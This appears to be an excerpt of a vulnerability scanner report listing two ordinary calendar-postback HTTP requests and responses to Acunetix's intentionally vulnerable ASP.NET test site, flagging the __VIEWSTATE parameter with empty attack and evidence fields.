Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8459&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAL7weGdsIZGRkP4amw%2BJwJLg90oj0TeHe%2Fs89ejU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKA%2BO3GAwLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJGMaP0KwEem6XndajfEjcn5KdsPA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:10 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAL7weGdsIZGRkP4amw+JwJLg90oj0TeHe/s89ejU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKA+O3GAwLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJGMaP0KwEem6XndajfEjcn5KdsPA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:White" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1209 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,209 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8475&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAy2KxJdsIZGRkofQWb0ztptW10p%2BJgF0Qh9BLanI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLU6fQIAtGnrvIOAtCn5uMHAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBQKK%2BdfZCQKK%2BdfZCQKK%2Bcv8AgKK%2Bcv8AgKK%2Bf%2BTCgKK%2Bf%2BTCgKK%2BZO2AwKK%2BZO2AwKK%2BYfNDAKK%2BYfNDAKK%2BbvgBQKK%2BbvgBQKK%2Ba%2BHDQKK%2Ba%2BHDQKK%2BYPsCwKK%2BYPsCwKK%2BbeDAwKK%2BbeDAwK%2Fk%2BPECQK%2Fk%2BPECQK%2Fk5ebAQK%2Fk5ebAQK%2Fk4u%2BCgK%2Fk4u%2BCgK%2Fk7%2FVAwK%2Fk7%2FVAwK%2Fk9PpDAK%2Fk9PpDAK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkHuWc%2BNSvvhQDvU1zixs2Jty0QRg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:41 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAy2KxJdsIZGRkofQWb0ztptW10p+JgF0Qh9BLanI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLU6fQIAtGnrvIOAtCn5uMHAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBQKK+dfZCQKK+dfZCQKK+cv8AgKK+cv8AgKK+f+TCgKK+f+TCgKK+ZO2AwKK+ZO2AwKK+YfNDAKK+YfNDAKK+bvgBQKK+bvgBQKK+a+HDQKK+a+HDQKK+YPsCwKK+YPsCwKK+beDAwKK+beDAwK/k+PECQK/k+PECQK/k5ebAQK/k5ebAQK/k4u+CgK/k4u+CgK/k7/VAwK/k7/VAwK/k9PpDAK/k9PpDAK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkHuWc+NSvvhQDvU1zixs2Jty0QRg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:White" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
